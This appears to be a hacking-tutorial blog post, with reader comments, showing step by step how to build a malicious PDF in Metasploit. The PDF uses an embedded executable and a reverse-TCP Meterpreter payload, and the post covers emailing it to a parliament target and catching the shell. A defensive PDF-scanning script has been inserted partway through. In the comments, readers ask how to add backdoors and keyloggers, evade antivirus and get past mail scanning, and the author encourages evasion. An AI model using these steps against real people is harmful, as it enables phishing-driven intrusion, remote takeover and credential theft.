Client Side Attack Using Adobe PDF Escape EXE Social Engineering

Type : Tutorial

Level : Medium, Hard

Testing Platform : Win XP SP3, Windows 7

Vulnerable Application Tested : Adobe Reader 9.1

Some people say that the weakest link in security is the human. I can't say that is WRONG, because in fact the human is the weakest link, but I also can't say it is completely TRUE, because often people don't know what they are doing simply because no one told them before 🙂 .

In this tutorial I will demonstrate a client-side attack using the Adobe PDF Escape EXE vulnerability. Almost 95% (maybe) of Windows users have Adobe Acrobat (Acrobat Reader) installed on their computers or laptops.

If you were watching or reading the news a few weeks ago about the Australian parliament's computers being compromised by an unknown hacker: that hacker actually used a social engineering technique to gain privileges on the parliament computers, and it was almost the same method used in this tutorial.

Okay, here's the scenario for this attack method:

1. The parliament has an e-mail address, let's say parliament@vishnuvalentino.com. Usually this type of user (maybe about 80%) only knows how to use a computer without knowing the risks; if there's any problem, they call IT support to fix the mess 🙂 .

In this scenario the attacker (me) will attack using computer-based social engineering. After a few visits to Facebook and Google, and also some dumpster diving around the parliament office, the attacker has finally collected a list of parliament e-mail addresses.

Requirement :

1. Metasploit Framework

2. Windows or Linux OS (I'm using BackTrack 5 in this tutorial)

Step By Step Client Side Attack Using Adobe PDF Escape EXE Social Engineering:

1. The first step is to create the malicious PDF used in this attack, using the Adobe Reader vulnerability "Adobe PDF Escape EXE Social Engineering No JavaScript".

Legend:

use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs --> use the Adobe PDF embedded EXE exploit module

set payload windows/meterpreter/reverse_tcp --> set the payload so that a Meterpreter session is returned when the exploit succeeds

set filename Important_Meeting_Notice.pdf --> make the file name as interesting as you can so the victim will open your malicious PDF

set lhost 192.168.8.92 --> attacker IP address (change it to your IP)

set lport 443 --> I'm using this port to prevent the victim's proxy from blocking the traffic (443 is always open :p )

exploit --> generate the malicious PDF

After we successfully generate the malicious PDF, it is stored on your local computer. In the screenshot I've highlighted the directory containing the malicious PDF file with a yellow marker.

2. The next step is sending our malicious file to the target e-mail address. In this case I will send it to parliament@vishnuvalentino.com (see our scenario if you're still asking why).

3. After sending our malicious PDF file, we need to set up a listener to capture the reverse connection. We will use msfconsole to set up our multi/handler listener.

4. The victim (parliament@vishnuvalentino.com) opens the e-mail and scans the attachment using their antivirus.

The antivirus finds nothing.

5. After the victim opens our malicious PDF file, an alert box appears; the document guides the victim to tick "Do not show this message again" and click Open.

6. After the victim clicks the Open button, our listener captures the reverse connection.

Yep, we're in! 🙂

Notes :

– After successfully performing this attack, try to migrate the process to Explorer.exe (see the tutorial here, steps 2 and 3).

Countermeasure :

1. When you open a file and an alert appears, read the alert carefully. Clicking "Next" or "OK" as soon as an alert appears is not always a good idea 😛
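The lure in this tutorial works because the PDF carries an embedded executable and Adobe Reader offers to launch it; the alert box in step 5 is that offer. From the defender's side, those same document features are what a mail gateway or a triage script should flag before a user ever sees the prompt. The Python below is an added example, not code from the original post or from Metasploit: it inflates FlateDecode streams, undoes the #xx hex escapes that PDF names allow, and counts name tokens associated with embedded files, Launch actions and JavaScript. Both sample PDFs are constructed inline for the demonstration, and the object layout, the /Launch action and all function names are my assumptions about how such a document is put together, not something the tutorial shows.

```python
"""Triage a PDF for the features a social-engineering lure relies on.

Added example, not part of the original post. Heuristic only: a real
deployment would pair this with a full PDF parser and the mail scanner.
"""
import re
import zlib

# PDF name tokens whose presence warrants a closer look (assumed risk list).
RISKY_NAMES = (b"/EmbeddedFile", b"/Launch", b"/JavaScript", b"/JS",
               b"/OpenAction", b"/AA")

NAME_HEX_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.DOTALL)


def normalize_names(data: bytes) -> bytes:
    """Undo #xx escapes so an obfuscated /Launc#68 matches /Launch."""
    return NAME_HEX_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def inflate_streams(data: bytes) -> bytes:
    """Return the plaintext of every stream that inflates as zlib data."""
    out = []
    for m in STREAM_RE.finditer(data):
        try:
            out.append(zlib.decompress(m.group(1)))
        except zlib.error:
            continue  # not Flate-compressed (or damaged); nothing to inspect
    return b"\n".join(out)


def scan_pdf(data: bytes) -> dict:
    """Count risky name tokens in the raw file and in its inflated streams."""
    if not data.startswith(b"%PDF-"):
        raise ValueError("not a PDF header")
    visible = normalize_names(data)
    hidden = normalize_names(inflate_streams(data))
    counts = {}
    for name in RISKY_NAMES:
        # Negative lookahead stops /JS from matching a longer name like /JSx.
        pattern = re.compile(re.escape(name) + rb"(?![A-Za-z0-9])")
        n = len(pattern.findall(visible)) + len(pattern.findall(hidden))
        if n:
            counts[name.decode()] = n
    return counts


def verdict(counts: dict) -> str:
    """An embedded file plus a Launch action is the lure pattern from the tutorial."""
    if "/EmbeddedFile" in counts and "/Launch" in counts:
        return "suspicious: embedded file with Launch action"
    if counts:
        return "review: " + ", ".join(sorted(counts))
    return "clean"


def build_sample(objects: list) -> bytes:
    """Assemble a minimal xref-less PDF from object bodies (constructed test data)."""
    body = b"%PDF-1.4\n"
    for i, obj in enumerate(objects, 1):
        body += b"%d 0 obj\n" % i + obj + b"\nendobj\n"
    return body + b"%%EOF\n"


# Constructed benign document: catalog and an empty page tree.
BENIGN_PDF = build_sample([
    b"<< /Type /Catalog /Pages 2 0 R >>",
    b"<< /Type /Pages /Kids [] /Count 0 >>",
])

# Constructed lure: embedded file, a hex-escaped Launch action wired to
# /OpenAction, and a Flate-compressed stream hiding a JavaScript action.
_hidden_js = zlib.compress(b"<< /S /JavaScript /JS () >>")
LURE_PDF = build_sample([
    b"<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >>",
    b"<< /Type /Pages /Kids [] /Count 0 >>",
    b"<< /Type /EmbeddedFile /Length 0 >>\nstream\n\nendstream",
    b"<< /S /Launc#68 /F 3 0 R >>",
    b"<< /Length %d /Filter /FlateDecode >>\nstream\n" % len(_hidden_js)
    + _hidden_js + b"\nendstream",
])

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_PDF), ("lure", LURE_PDF)):
        found = scan_pdf(doc)
        print(label, found, "->", verdict(found))
```

Running the block prints "clean" for the benign sample and "suspicious: embedded file with Launch action" for the constructed lure, because the scanner sees through both the hex-escaped name and the compressed stream. The catch it does not handle is object streams or encryption, which hide dictionaries behind another layer; that is why the result is a triage signal rather than a verdict on its own.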

Hope you enjoyed it! 🙂

Blogger at hacking-tutorial.com. Loves PHP, offensive security and the web. Contact him at me[-at-]vishnuvalentino.com

Website : http://www.vishnuvalentino.com

  • js11

    I cannot find the malicious PDF file.

    • v4L

      #js11
      It's located in your /root/.msf4/data/exploits/ folder.

    • chris g

      Run this from a new shell:
      mv /root/.msf4/local/msf.pdf /root/Desktop/

  • js11

    Yeah, I know that, but there's no folder (/.msf4) in /root.

    • v4L

      #js11
      Then you should search for that .msf/ folder.
      Hope it's solved soon.

  • Pheonix_Fire

    Once we are in our victim's computer, is there any way to create a backdoor so we can enter again easily?
    Thanks

  • Pheonix_Fire

    One more thing: how to run a keylogger once you have compromised the victim's computer?

  • Jeevan

    How to get remote access to a Windows 7 PC using Metasploit?

  • looph.crack

    Just a question though. I'll be testing this method with a friend. His PC is in a totally different place (not within the LAN). I'll try sending him the PDF file and then set up a listener on my end. Will it be able to connect to my listener even though he's not part of my LAN? I know the question sounds redundant, but I just want to know whether SET attacks are usually for LAN only…

  • AJ

    Hi, I set up everything, but on the attacker computer the listener never captures that I opened it on my compromised computer. What could be wrong?

    • v4L

      #AJ
      How about the Adobe version on the victim machine?

  • Antoine

    Hi,

    My question was :

    Why is this hack technique not caught by AVs?
    They should see the Meterpreter payload signature, no?
    Or perhaps other AVs detect it?
    Or perhaps it is not FUD anymore?

    Thanks for this site, really interesting 🙂

  • Nice, almost all AVs can't find it 😀

  • Russell

    AVG 2013 detected the file and did not allow me to send the email 🙁

  • Joe

    I was able to successfully generate the PDF, but Gmail won't let me send it, and Yahoo has a mailer daemon saying it can't send it.
    Any ideas?

  • babar

    Hello,
    this is actually a quite useful website.
    I have recently started working in MSF and SET.
    I have practised this section of email-based attack,
    but I don't think it is applicable now, as antiviruses are good enough to identify and delete it
    before any activity. Kindly tell me how we should achieve the task of embedding an exe in a PDF
    without antivirus intrusion. Thank you in advance and God bless you.

    • v4L

      #babar
      For that, you can try and find out by yourself…
      If someone publishes their work about "my exploit was not detected by antivirus", then just wait about 1 hour and the antivirus company will make an update to detect it.
      BTW, yes, it's true that the whole Metasploit Framework, if you use it in default mode, will be detected by antivirus. So… be creative.

  • LoophCrack

    Hi Vishnu. Great job here, and thanks for updating and answering questions here as well. BTW, I'd like to set up a pentest lab using only one PC, and I plan to run both BackTrack and a Windows 7 machine on VMware. Is that a possible setup?

    • v4L

      #LoophCrack
      Yes, of course. I use VirtualBox and can run BT5 R3, Win 7, and Debian 6 simultaneously and everything was OK, just a little bit slow, depending on your computer performance 🙂

  • LoophCrack

    I seem to be having an issue because I'm using a USB modem. Do I have to set up VMware as host-only adapter for both BT and Win7? This is the only brick wall hindering me from learning.

  • Wen Qi

    Hi there,

    Thanks for the great tutorial. I really need help here. Is there any way to disable the alert after you open the PDF? Or do you have another PDF exploit guide showing how to do it so that the popup will not appear?

    I tried Adobe Reader v9.0 and 9.33; both start up the alert, which is not cool. I tried to change the security settings but to no avail. Do you have a workaround for this?

    Thanks!

  • Bluesaint

    I am getting the following error -> options failed to validate: INFILENAME

    • tyler durdan

      Did you figure this out? Having the same issue..

  • rara

    Hi, thanks for this tutorial.
    But when I attach this PDF in Gmail or Yahoo it shows "virus found". Is there any way to hide it and send it?